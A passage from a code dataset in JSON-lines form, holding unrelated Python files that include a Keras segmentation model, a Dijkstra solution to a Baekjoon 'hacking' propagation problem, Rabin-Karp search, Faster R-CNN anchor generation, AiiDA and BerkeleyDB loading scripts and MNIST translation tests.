CSF = Lambda(lambda x: x[...,2:3])(x)\n GM = Lambda(lambda x: x[...,3:4])(x)\n WM = Lambda(lambda x: x[...,4:5])(x)\n y_tumors = my_attention(y_tumors,BK,inputs)\n CSF = my_attention(CSF,BK,inputs)\n GM = my_attention(GM,BK,inputs)\n WM = my_attention(WM,BK,inputs)\n combin = concatenate([BK,y_tumors, CSF, GM, WM], axis=-1)\n combin = res_block_attention(combin,32)\n output = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax', name='output2',kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(combin)\n y_tumors = Lambda(lambda x: x[..., 1:2], name='y_tumors')(output)\n CSF = Lambda(lambda x: x[..., 2:3], name='CSF')(output)\n GM = Lambda(lambda x: x[..., 3:4], name='GM')(output)\n WM = Lambda(lambda x: x[..., 4:5], name='WM')(output)\n model = Model(inputs=[inputs,inputs1,inputs2,inputs3,inputs4], outputs=[x8,x16,x32,x64,x,output,y_tumors,CSF,GM,WM])\n return model\nmodel = ResNetR3_attention_mutil_scale((64,64,64,1), (64,64,64,1),(64,64,64,1),(64,64,64,1),(64,64,64,1))\nmodel.summary()","repo_name":"fcfd97/GLM-Net","sub_path":"my_model.py","file_name":"my_model.py","file_ext":"py","file_size_in_byte":10152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27887708293","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\n\nfrom heapq import heappush, heappop\n\ndef solution(start):\n dist = [9876543210 for _ in range(N+1)]\n heap = []\n\n heappush(heap, (0, start))\n total = 0\n while heap:\n t, com = heappop(heap)\n\n if not visited[com]:\n visited[com] = 1\n dist[com] = t\n total += 1\n\n for i in adj[com]:\n if not visited[i]:\n heappush(heap, (t + adj[com][i], i))\n\n MAX = 0\n for time in dist:\n if time != 9876543210:\n MAX = max(MAX, time)\n\n return total, MAX\n\n\nfor tc in range(1, int(input())+1):\n N, M, start = map(int, input().split())\n adj = [{} for _ in range(N+1)]\n visited = [0 for _ in range(N+1)]\n\n for _ in range(M):\n a, b, time = map(int, input().split())\n adj[b][a] = time\n\n print(*solution(start))","repo_name":"dth12/algorithm","sub_path":"baekjoon/10282_G4_해킹.py","file_name":"10282_G4_해킹.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"18154516258","text":"#coding=utf-8\nimport copy\n\nWEIGHT_TAG = 5\nWEIGHT_TAG_NEGA = -0.5\nWEIGHT_ROUND = 3\nWEIGHT_ROUND_NEGA = 0\n\n\ndef transTag(tags):\n assert isinstance(tags, (list, tuple)), 'tags-(%s) 不是数组或者元组类型'% tags\n newTags = []\n for tag in tags:\n assert isinstance(tags, (list, tuple)), 'tag-(%s) 不是int类型' % tag\n if tag > 18:\n tag = tag - 14\n newTags.append(tag)\n resTags = []\n for i in range(1, 43):\n if i in newTags:\n resTags.append(WEIGHT_TAG)\n else:\n resTags.append(WEIGHT_TAG_NEGA)\n return resTags\n\n\n\n\n\n\nprojDic = {}\nf1 = open('projdata.csv', 'r')\nlines = f1.readlines()\nfor line in lines:\n data = line.replace('\\n', '').split(',')\n projDic[data[0]] = data\nf1.close()\n\nbdlist = []\nf2 = open('bdresponse.csv', 'r')\nlines = f2.readlines()\nfor line in lines:\n bdlist.append(line.replace('\\n', '').split(','))\nf2.close()\n\n\ndef savedata(data):\n with open('test8-4.csv', 'a') as f:\n f.write(','.join(data))\n f.write('\\n')\n\n# for bd in bdlist:\n# if projDic[bd[0]]:\n# newlist = copy.deepcopy(projDic[bd[0]])\n# newlist[-12] = bd[1]\n#\n# newlist.append(bd[2])\n# savedata(newlist)\n\n\n\n\ndef checkPredictResult(predictList, proj_id):\n rep = False\n for org_id in predictList:\n for bd in bdlist:\n if proj_id == bd[0] and str(org_id) == bd[1] :\n newlist = copy.deepcopy(projDic[proj_id])\n newlist[-12] = str(org_id)\n newlist.append(bd[2])\n savedata(newlist)\n rep = True\n break\n if rep:\n break\n\n\n\n\npredictres = {\n '521':[7089, 6800, 28311, 7491, 23600, 5013, 33372, 4755, 10187, 7028, 6602, 30750, 30531, 4440, 847, 23596, 24255, 287, 33418, 28, 24484, 4304, 23717, 1409, 23547, 7577, 30161, 716, 909, 31095, 7566, 24417, 13676, 4589, 160, 4425, 322, 30908, 24388, 30178, 28352, 7572, 3397, 23590, 4209, 29425, 4763, 24387, 4927, 4872]\n}\n\nfor key, value in predictres.items():\n checkPredictResult(value, key)\n\n","repo_name":"wujunke/pythons","sub_path":"python/emptygit/tfdata/data2/transBDResponse.py","file_name":"transBDResponse.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"3711091188","text":"T=int(input())\nfor _ in range(1,T+1):\n t=int(input())\n D={}\n L=list(map(int,input().split()))\n for l in L:\n if l not in D.keys():\n D[l]=1\n else:\n D[l]+=1\n m=max(D.values())\n ML=[key for key in D.keys() if D[key]==m]\n print(f'#{t} {max(ML)}')","repo_name":"koreamarin/09.Coding_test","sub_path":"Python/02.SWEA/D2/1204_최빈수_구하기.py","file_name":"1204_최빈수_구하기.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32511108128","text":"#LAB.12 -โปรแกรมหาผลรวม/ค่าเฉลี่ย *ประยุกค์การใช้คำสั่ง while\r\nusernum = int(input(\"ป้อนจำนวนรอบ :\")) #inputนับจำนวนรอบ\r\ncount = 0 #ตัวแปรนับจำนวนรอบ\r\nsumObj = 0 #ตัวแปรเก็บค่าผลรวม\r\nwhile(count>=0):\r\n score=int(input(\"ป้อนตัวเลขmที่ %d :\"%(count+1)))\r\n sumObj+=score\r\n count+=1\r\n if(count==usernum):\r\n break\r\nprint(\"ผลรวมตัวเลข =%d:\"%sumObj) \r\nprint(\"หาค่าเฉลี่ย : %d\"%(sumObj/count))\r\n","repo_name":"chatchard47/python_basic","sub_path":"lab12.py","file_name":"lab12.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23536740961","text":"from rich.console import Console\nfrom genericworker import *\nfrom RoboCompImageBasedGestureRecognition import *\nimport traceback\nimport numpy as np\nimport time\nimport cv2\nimport pickle as pkl\n\nsys.path.append('/opt/robocomp/lib')\nconsole = Console(highlight=False)\n\n\nclass Timer:\n def __init__(self, fps):\n self.fps = fps\n self.ms = 1000 / fps\n self.tick = None\n\n # tock - current time in milliseconds\n def isReady(self, tock):\n if self.tick is None or tock - self.tick > self.ms:\n self.tick = tock\n return True\n return False\n\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\n\n\nclass SpecificWorker(GenericWorker):\n def __init__(self, proxy_map, startup_check=False):\n super(SpecificWorker, self).__init__(proxy_map)\n self.timer.timeout.connect(self.compute)\n self.Period = 30\n self.timer.start(self.Period)\n # self.visualizer = Visualizer()\n self.cam_timer = Timer(fps=30)\n self.inference_timer = Timer(fps=10)\n self.capL = cv2.VideoCapture(0)\n\n self.max_num_images = 64\n self.list_frames = []\n\n self.wlasl_class = pkl.load( open(\"src/wlasl_name.pkl\", \"rb\" ) )\n\n self.last_class = \"\"\n self.font = cv2.FONT_HERSHEY_SIMPLEX\n self.classes = {}\n\n def __del__(self):\n console.print('SpecificWorker destructor')\n\n def setParams(self, params):\n return True\n\n @QtCore.Slot()\n def compute(self):\n now = current_milli_time()\n cam_ready = self.cam_timer.isReady(now)\n if cam_ready:\n retL, self.frameL = self.capL.read()\n if self.frameL is not None:\n if self.last_class != \"\":\n cv2.putText(self.frameL, self.last_class, (20,20), self.font, 10, (0,0,0), 2)\n cv2.imshow(\"visual\", self.frameL)\n self.list_frames.append(self.frameL)\n\n if self.inference_timer.isReady(now) and len(self.list_frames) >= self.max_num_images:\n input = TVideo()\n\n input.images = np.stack(self.list_frames, axis=0)\n input.height, input.width, input.depth = self.list_frames[0].shape\n input.numFrames = len(self.list_frames)\n\n self.list_frames = self.list_frames[len(self.list_frames)//2:]\n output = self.imagebasedgesturerecognition_proxy.getGesture(input)\n\n if output.gestureProb[0] > 0.25:\n print(\"top 5 actions\")\n action = []\n for ele in output.gestureIndex:\n action.append(self.wlasl_class[int(ele)])\n print(action)\n print(output.gestureProb)\n self.last_class = action[0]\n\n if action[0] not in self.classes:\n self.classes[action[0]] = 1\n else:\n self.classes[action[0]] +=1\n print(self.classes)\n else:\n print(\"nothing\")\n self.last_class = \"\"\n\n return True\n\n def startup_check(self):\n import time\n time.sleep(0.2)\n exit()\n\n ######################\n # From the RoboCompCameraSimple you can call this methods:\n # self.camerasimple_proxy.getImage(...)\n\n ######################\n # From the RoboCompCameraSimple you can use this types:\n # RoboCompCameraSimple.TImage\n\n ######################\n # From the RoboCompImageBasedGestureRecognition you can call this methods:\n # self.imagebasedgesturerecognition_proxy.getGesture(...)\n\n ######################\n # From the RoboCompImageBasedGestureRecognition you can use this types:\n # RoboCompImageBasedGestureRecognition.TVideo\n # RoboCompImageBasedGestureRecognition.GestureResult\n","repo_name":"robocomp/robocomp-robolab","sub_path":"components/detection/test/imageBasedGestureRecognitionClient/src/specificworker.py","file_name":"specificworker.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"79"} +{"seq_id":"32131247919","text":"def rabin_karp_match(txt, pat):\n M = len(pat)\n N = len(txt)\n d = 256 # number of characters in the input alphabet\n q = 101 # prime number\n p = 0 # hash value for pattern \n t = 0 # hash value for input text\n pos = []\n # Rabin-Karp algorithm\n h = d**(M-1) % q\n # hash value of pattern and first window of text \n for i in range(M):\n p = (d*p + ord(pat[i])) % q\n t = (d*t + ord(txt[i])) % q\n # slide the pattern over text one by one \n for i in range(N - M+1):\n # check the hash values of current window of text and pattern\n # if the hash values match then only...\n if p == t: \n # ...check for characters (one by one)\n if pat == txt[i:i+M]:\n pos.append(i)\n \n # calculate hash value for next window of text:\n # remove leading digit, add trailing digit\n if i < N-M: \n t = (d * (t-ord(txt[i]) * h) + ord(txt[i+M])) % q\n # it might result in negative values of t\n if t < 0:\n t = t + q\n return pos\n\nif __name__ == \"__main__\":\n s = \"The building fronts are just fronts, to hide the people watching.\"\n print(s)\n\n sub = \"front\"\n match = rabin_karp_match(s, sub)\n print(\n \"The substring '{}' is present at {} position(s): {}.\"\n .format(sub, len(match), match)\n )\n sub = \"ing\"\n match = rabin_karp_match(s, sub)\n print(\n \"The substring '{}' is present at {} position(s): {}.\"\n .format(sub, len(match), match)\n )","repo_name":"alexmadrinanfdez/basic-python","sub_path":"algos/search/string/rabin_karp.py","file_name":"rabin_karp.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29329368135","text":"# Assignment: Mini Project 1\n# Due Date: October, 27 2015\n# Name: Ismail Mare, Janice Loo, Preyanshu Kumar\n# Unix ID: imare, jloo, preyansh\n# StudentID: 1388973, 1359624, 1395321\n# Lecture Section: B1\n# Instructor: Davood Rafiei\n#---------------------------------------------------------------\n#\n \n#importing necessary libraries\nimport sys\nimport datetime\nimport math\nimport random\nimport time\nimport string\nimport sys\nimport subprocess\nimport re\nfrom bsddb3 import db\n\n\n\n\n\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n\n\n\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#PHASE 2\n\n\ndef db_load_prep(filename):\n\ttarget=open(filename,'r')\n\twrite=(filename.split('.'))[0]+\"_load\"+\".txt\"\n\twrite1=open(write,'w')\n\tfor line in target:\n\t\tsecond_half=''\n\t\tcontents=line.split(',')\n\t\twrite1.write(contents[0])\n\t\twrite1.write('\\n')\n\t\tfor i in range(1,len(contents)):\n\t\t\tsecond_half+=contents[i]\n\t\twrite1.write(second_half)\n\ttarget.close()\n\twrite1.close()\n\treturn\n\n\n\n\ndef db_load_prep_reviews(filename):\n\ttarget=open(filename,'r')\n\twrite=(filename.split('.'))[0]+\"_load\"+\".txt\"\n\twrite1=open(write,'w')\n\tfor line in target:\n\t\tsecond_half=''\n\t\tcontents=line.split(',')\n\t\twrite1.write(contents[0])\n\t\twrite1.write('\\n')\n\t\tfor i in range(1,len(contents)):\n\t\t\tif i > 1:\n\t\t\t\tsecond_half+=\",\"+contents[i]\n\t\t\telse:\n\t\t\t\tsecond_half+=contents[i]\n\t\twrite1.write(second_half)\n\ttarget.close()\n\twrite1.close()\n\n\n\ndef phase2():\n\tsubprocess.call('sort rterms.txt | uniq -u',shell=True)\n\tsubprocess.call('sort pterms.txt | uniq -u',shell=True)\n\tsubprocess.call('sort scores.txt | uniq -u', shell=True)\n\n\tdatabase_rw = db.DB()\n\tdatabase_pt = db.DB()\n\tdatabase_rt = db.DB()\n\tdatabase_sc = db.DB()\n\n\tdatabase_sc.set_flags(db.DB_DUP) \n\tdatabase_rt.set_flags(db.DB_DUP) \n\tdatabase_pt.set_flags(db.DB_DUP)\n\n\n\tdatabase_rw.open(\"rw.idx\",None,db.DB_HASH,db.DB_CREATE)\n\tdatabase_pt.open(\"pt.idx\",None,db.DB_BTREE,db.DB_CREATE)\n\tdatabase_rt.open(\"rt.idx\",None,db.DB_BTREE,db.DB_CREATE)\n\tdatabase_sc.open(\"sc.idx\",None,db.DB_BTREE,db.DB_CREATE)\n\n\t#db_load_prep(\"scores.txt\") #Now files loaded for db called: scores_load.txt\n\t#db_load_prep(\"pterms.txt\") #Now files loaded for db called: pterms_load.txt\n\t#db_load_prep(\"rterms.txt\") #Now files loaded for db called: rterms_load.txt\n\t#db_load_prep_reviews(\"reviews.txt\") #Now files loaded for db called: reviews_load.txt\n\n\tcurs_rw=database_rw.cursor()\n\t#subprocess.call('db_load -f reviews_load.txt -T -t hash rw.idx',shell=True)\n\tsubprocess.call('cat reviews.txt |./perl_script.pl | db_load -T -t hash rw.idx',shell=True)\n\t#test#################\n\t#iter = curs_rw.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_rw.next()\n\t######################\n\n\tcurs_rw.close()\n\tdatabase_rw.close()\n\n\tcurs_rt=database_rt.cursor()\n\t#subprocess.call('db_load -f rterms_load.txt -T -t btree rt.idx',shell=True)\n\tsubprocess.call('cat rterms.txt |./perl_script.pl | db_load -T -t btree rt.idx',shell=True)\n\t#test#################\n\t#iter = curs_rt.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_rt.next()\n\t######################\n\n\tcurs_rt.close()\n\tdatabase_rt.close()\n\n\tcurs_pt=database_pt.cursor()\n\t#subprocess.call('db_load -f pterms_load.txt -T -t btree pt.idx',shell=True)\n\tsubprocess.call('cat pterms.txt |./perl_script.pl | db_load -T -t btree pt.idx',shell=True)\n\t#test#################\n\t#iter = curs_pt.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_pt.next()\n\t######################\n\n\tcurs_pt.close()\n\tdatabase_pt.close()\n\n\tcurs_sc=database_sc.cursor()\n\t#subprocess.call('db_load -f scores_load.txt -T -t btree sc.idx',shell=True)\n\tsubprocess.call('cat scores.txt |./perl_script.pl | db_load -T -t btree sc.idx',shell=True)\n\t#test#################\n\t#iter = curs_sc.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_sc.next()\n\t######################\n\n\tcurs_sc.close()\n\tdatabase_sc.close()\n\n\treturn \n\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n\n\n\n\n# Main()\n\n\ndef main():\n\tphase2()\n\treturn\n\n\n\n\n\n\nmain()\n","repo_name":"ismailmare/c291g05-Proj-2","sub_path":"phase2.py","file_name":"phase2.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71156554494","text":"def solution(prices):\n answer = [0 for _ in range(len(prices))]\n\n stack = []\n\n for i, p in enumerate(prices):\n if not stack:\n stack.append([i, p])\n continue\n \n if stack[-1][1] <= p: \n stack.append([i, p])\n continue\n\n while stack:\n if stack[-1][1] <= p: break\n\n top = stack.pop(-1)\n answer[top[0]] = i - top[0]\n\n stack.append([i, p])\n \n while stack:\n top = stack.pop(-1)\n\n answer[top[0]] = len(prices) - 1 - top[0]\n \n return answer\n\nprices = [1, 2, 3, 2, 3]\nans = solution(prices)\nprint(ans)","repo_name":"praivesi/Algorithms_2","sub_path":"programmers/level2/StockPrice.py","file_name":"StockPrice.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24626395398","text":"# O Twitter é conhecido por limitar as postagens em 280\n# caracteres. Conferir se um texto vai caber em um tuíte é o\n# desafio.\n\n# Entrada:\n\n# A entrada é uma linha de texto.\n\n# Saída:\n\n# A saída é dada em uma única linha. Ela deve ser TWEET se\n# a linha de texto conter até 280 caracteres. Se a entrada da\n# linha texto tiver mais 280 caracteres, a saída deve ser \"Esse\n# texto é maior que o esperado\".\n\ntweet = input('O que você está pensando hoje? ')\n\nif len(tweet) <= 280:\n print('TWEET')\nelse:\n print('Esse texto é maior que o esperado.')","repo_name":"VICTORIAGUI/pyhton_23-11","sub_path":"desafio02.py","file_name":"desafio02.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24653284645","text":"from PIL import Image\n\n\nimgx,imgy=1024,1024 # IMAGE DIMENSIONS\nimage = Image.new(\"RGB\",(imgx,imgy)) # CREATES IMAGE ACCORDING TO DIMENSIONS\n\nfor x in range(imgx):\n\tfor y in range(imgy):\n\t\tR,G,B=int(255-(80*x/imgx)),int(179-(179*x/imgx)),int(15+(75*x/imgx))\n\t\timage.putpixel((x,y),(R,G,B)) # GLOWY MANDELBROT EFFECT\nimage.save(\"gradient.png\") # SAVES IMAGE","repo_name":"suddenlykevin/cs550mandelbrot","sub_path":"experimentation/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70050805697","text":"import sys\n\nPY2 = sys.version_info[0] == 2\n\nif not PY2:\n string_types = (str,)\n\n def logger_has_handlers(logger):\n return logger.hasHandlers()\n\nelse:\n string_types = (str, unicode)\n\n # backported from PY3 logging.Logger.hasHandlers\n def logger_has_handlers(logger):\n c = logger\n rv = False\n while c:\n if c.handlers:\n rv = True\n break\n if not c.propagate:\n break\n else:\n c = c.parent\n return rv\n","repo_name":"zhl2008/awd-platform","sub_path":"web_flaskbb/lib/python2.7/site-packages/flask_alembic/_compat.py","file_name":"_compat.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":574,"dataset":"github-code","pt":"79"} +{"seq_id":"17440574192","text":"import time\nimport torch\nimport numpy as np\nfrom utils.util import cxcy_to_xy, xy_to_cxcy\n\n\nclass FRCNNAnchorMaker(object):\n\n def __init__(self, base_size=16, ratios=[0.5, 1, 2], anchor_scales=[8, 16, 32]):\n self.base_size = base_size\n self.ratios = ratios\n self.anchor_scales = anchor_scales\n self.anchor_base = self.generate_anchor_base()\n\n def generate_anchor_base(self):\n\n px = self.base_size / 2.\n py = self.base_size / 2.\n\n anchor_base = np.zeros((len(self.ratios) * len(self.anchor_scales), 4), dtype=np.float32)\n for i in range(len(self.ratios)):\n for j in range(len(self.anchor_scales)):\n w = self.base_size * self.anchor_scales[j] * np.sqrt(self.ratios[i])\n h = self.base_size * self.anchor_scales[j] * np.sqrt(1. / self.ratios[i])\n\n index = i * len(self.anchor_scales) + j\n anchor_base[index, 0] = px - w / 2.\n anchor_base[index, 1] = py - h / 2.\n anchor_base[index, 2] = px + w / 2.\n anchor_base[index, 3] = py + h / 2.\n\n return anchor_base\n\n def _enumerate_shifted_anchor(self,\n origin_image_size):\n\n origin_height, origin_width = origin_image_size\n width = origin_width // self.base_size\n height = origin_height // self.base_size\n feat_stride = self.base_size\n\n shift_x = np.arange(0, width * feat_stride, feat_stride)\n shift_y = np.arange(0, height * feat_stride, feat_stride)\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n shift = np.stack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel()), axis=1)\n\n A = self.anchor_base.shape[0]\n K = shift.shape[0]\n anchor = self.anchor_base.reshape((1, A, 4)) + shift.reshape((1, K, 4)).transpose((1, 0, 2))\n anchor = anchor.reshape((K * A, 4)).astype(np.float32)\n\n divisor = np.array([origin_width, origin_height, origin_width, origin_height])\n anchor /= divisor\n\n return anchor\n\n\nclass FasterRCNN_Anchor(object):\n def create_anchors(self, image_size, num_pooling=4):\n print('make retina anchors')\n\n # get height and width of features\n image_height, image_width = size = image_size # h, w\n feature_height, feature_width = image_height, image_width\n\n for i in range(num_pooling):\n feature_height = feature_height // 2\n feature_width = feature_width // 2\n\n areas = [128, 256, 512]\n aspect_ratios = np.array([0.5, 1.0, 2.0])\n center_anchors = []\n\n # 4. make anchors\n for i in range(feature_height): # f_h\n for j in range(feature_width): # f_w\n c_x = (j + 0.5) / feature_width # (0-1 scaling)\n c_y = (i + 0.5) / feature_height # (0-1 scaling)\n for aspect_ratio in aspect_ratios:\n for area in areas:\n w = (area / image_width) * np.sqrt(aspect_ratio)\n h = (area / image_height) / np.sqrt(aspect_ratio)\n anchor = [c_x,\n c_y,\n w,\n h]\n center_anchors.append(anchor)\n\n center_anchors = np.array(center_anchors).astype(np.float32)\n center_anchors = torch.FloatTensor(center_anchors) # .to(device)\n\n # -------------------- 5. ignore the cross-boundary anchors --------------------\n\n # 5.1. convert corner anchors\n corner_anchors = cxcy_to_xy(center_anchors)\n\n # 5.2. check cross-boundary anchors\n keep = ((corner_anchors[:, 0] >= 0) & (corner_anchors[:, 1] >= 0) \\\n & (corner_anchors[:, 2] < 1) & (corner_anchors[:, 3] < 1))\n\n # center_anchors = center_anchors[keep]\n # At (600, 1000) image has 20646 all anchors but the number of cross-boundary anchors is 7652.\n\n visualization = False\n if visualization:\n\n # original\n corner_anchors = cxcy_to_xy(center_anchors)\n\n # # center anchor clamp 방식!\n # corner_anchors = cxcy_to_xy(center_anchors).clamp(0, 1)\n # center_anchors = xy_to_cxcy(corner_anchors)\n\n from matplotlib.patches import Rectangle\n import matplotlib.pyplot as plt\n\n size = 300\n img = torch.ones([size, size, 3], dtype=torch.float32)\n\n plt.imshow(img)\n axes = plt.axes()\n axes.set_xlim([-1 * size, 3 * size])\n axes.set_ylim([-1 * size, 3 * size])\n\n for anchor in corner_anchors:\n x1 = anchor[0] * size\n y1 = anchor[1] * size\n x2 = anchor[2] * size\n y2 = anchor[3] * size\n\n plt.gca().add_patch(Rectangle(xy=(x1, y1),\n width=x2 - x1,\n height=y2 - y1,\n linewidth=1,\n edgecolor=[0, 1, 0],\n facecolor='none'\n ))\n plt.show()\n\n return center_anchors, keep\n\n\nif __name__ == '__main__':\n retina_anchor = FasterRCNN_Anchor()\n\n image_sizes = [[600, 1000], [800, 800], [880, 960]]\n # tic = time.time()\n # # ** 1st experiments\n # first_anchors = []\n # for image_size in image_sizes:\n # anchor = retina_anchor.create_anchors(image_size=image_size, num_pooling=4)\n # first_anchors.append(anchor)\n # print(time.time() - tic)\n # print(\"whole time: \", time.time() - tic)\n\n # # make retina anchors\n # # 0.06779313087463379\n # # make retina anchors\n # # 0.16553187370300293\n # # make retina anchors\n # # 0.30914855003356934\n\n # ** 2nd experiments 0.0009989738464355469\n # tic = time.time()\n frcnn_anchor_maker = FRCNNAnchorMaker()\n second_anchors = []\n anchor_base = frcnn_anchor_maker.generate_anchor_base()\n # print(time.time() - tic)\n for image_size in image_sizes:\n tic = time.time()\n anchor = frcnn_anchor_maker._enumerate_shifted_anchor(origin_image_size=image_size)\n anchor = torch.from_numpy(anchor).cuda()\n # n_anchor = anchor.shape[0] / ((image_size[0] // 16) * (image_size[1] // 16))\n # print(\"num_anchors : \", n_anchor)\n # second_anchors.append(anchor)\n print(time.time() - tic)\n print(\"whole time: \", time.time() - tic)\n # print('a')\n # center_anchor = anchor\n # print(center_anchor)\n\n # 0.0010082721710205078\n # 0.001994609832763672\n # 0.002991914749145508\n\n # 약 1000배 차이\n\n\n\n","repo_name":"csm-kr/faster_rcnn_pytorch","sub_path":"anchor.py","file_name":"anchor.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"25601617243","text":"#!/usr/bin/env runaiida\n# -*- coding: utf-8 -*-\n\n# © 2017-2019, ETH Zurich, Institut für Theoretische Physik\n# Author: Dominik Gresch \n\"\"\"\nRuns a 'tbmodels slice' calculation.\n\"\"\"\n\nimport os\n\nfrom aiida.orm import Code\nfrom aiida.orm import List\nfrom aiida.orm import SinglefileData\nfrom aiida.orm.querybuilder import QueryBuilder\nfrom aiida.engine.launch import run_get_pk\n\nfrom aiida_tbmodels.calculations.slice import SliceCalculation\n\n\ndef get_singlefile_instance(description, path):\n \"\"\"\n Retrieve an instance of SinglefileData with the given description, loading it from ``path`` if it does not exist.\n \"\"\"\n query_builder = QueryBuilder()\n query_builder.append(\n SinglefileData, filters={'description': {\n '==': description\n }}\n )\n res = query_builder.all()\n if len(res) == 0:\n # create archive\n res = SinglefileData(file=os.path.abspath(path))\n res.description = description\n res.store()\n elif len(res) > 1:\n raise ValueError(\n 'Query returned more than one matching SinglefileData instance.'\n )\n else:\n res = res[0][0]\n return res\n\n\ndef run_slice():\n \"\"\"\n Creates and runs the slice calculation.\n \"\"\"\n builder = SliceCalculation.get_builder()\n builder.code = Code.get_from_string('tbmodels')\n\n builder.tb_model = get_singlefile_instance(\n description=u'InSb TB model', path='./reference_input/model.hdf5'\n )\n\n # single-core on local machine\n builder.metadata.options = dict(\n resources=dict(num_machines=1, tot_num_mpiprocs=1), withmpi=False\n )\n\n builder.slice_idx = List(list=[0, 3, 2, 1])\n\n result, pid = run_get_pk(builder)\n print('\\nRan calculation with PID', pid)\n print('Result:\\n', result)\n\n\nif __name__ == '__main__':\n run_slice()\n","repo_name":"greschd/aiida-tbmodels","sub_path":"examples/slice/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"73089166335","text":"\"\"\"\nSome simple tests with translating / rotating / dilating / etc. MNIST images.\n\"\"\"\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Flatten, Reshape\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nimport cv2\nimport numpy as np\n\nimg_h = 28\nimg_w = 28\n\ndef disp_img_fullscreen(img, name=\"test\"):\n cv2.namedWindow(name, cv2.WND_PROP_FULLSCREEN) \n cv2.setWindowProperty(name, cv2.WND_PROP_FULLSCREEN, cv2.cv.CV_WINDOW_FULLSCREEN)\n cv2.imshow(name,img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef get_concatenated_row(samples):\n \"\"\"\n Concatenate each sample in samples horizontally, along axis 1.\n Return the resulting array.\n \"\"\"\n return np.concatenate([sample for sample in samples], axis=1)\n\ndef get_concatenated_col(samples):\n \"\"\"\n Concatenate each sample in samples vertically, along axis 0.\n Return the resulting array.\n \"\"\"\n return np.concatenate([sample for sample in samples], axis=0)\n\ndef transform_samples(samples, T):\n \"\"\"\n Given a 3d matrix samples and a transformation matrix T,\n return a new 3d samples matrix with each image transformed appropriately\n \"\"\"\n transformed_samples = np.zeros_like(samples)\n img_h, img_w = samples.shape[-2:]\n for i, sample in enumerate(samples):\n transformed_samples[i] = cv2.warpAffine(sample, T, (img_w, img_h))\n return transformed_samples\n\ndef translate_samples(samples, dx, dy):\n \"\"\"\n Given a 3d matrix samples, the translation delta x and delta y,\n return a new 3d samples matrix with each image translated appropriately.\n \"\"\"\n \"\"\"\n First generate translation matrix for cv2's warpAffine function\n \"\"\"\n T = np.float32([[1,0,dx], [0,1,dy]])\n\n return transform_samples(samples, T)\n\n(X_train, Y_train), (X_test, Y_test) = mnist.load_data()\n\n\"\"\"\nConvert to float32\n\"\"\"\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\n\"\"\"\nFeature Scale\n\"\"\"\nX_train /= 255\nX_test /= 255\n\n\"\"\"\nDisplay some outputs:\n Get a small portion of the test set, and get transformed samples\n\"\"\"\ndisplay_test_n = 16\nactual_samples = X_test[:display_test_n]\nx_translated_samples = translate_samples(actual_samples, 0, 10)\ny_translated_samples = translate_samples(actual_samples, 10, 0)\n\n\"\"\"\nThen create a row of actual samples, and a row for each transformation's samples.\nWe can then stack them on top of each other for easy multiple image comparison.\n\"\"\"\nactual_samples = get_concatenated_row(actual_samples)\nx_translated_samples = get_concatenated_row(x_translated_samples)\ny_translated_samples = get_concatenated_row(y_translated_samples)\ncomparison_img = get_concatenated_col((actual_samples, x_translated_samples, y_translated_samples))\ndisp_img_fullscreen(comparison_img)\n","repo_name":"BlueHephaestus/transforming-autoencoder-experiments","sub_path":"affine_tests/mnist_data_transformer.py","file_name":"mnist_data_transformer.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39209224267","text":"from src.modules.drop_activity.app.drop_activity_viewmodel import DropActivityViewmodel\nfrom 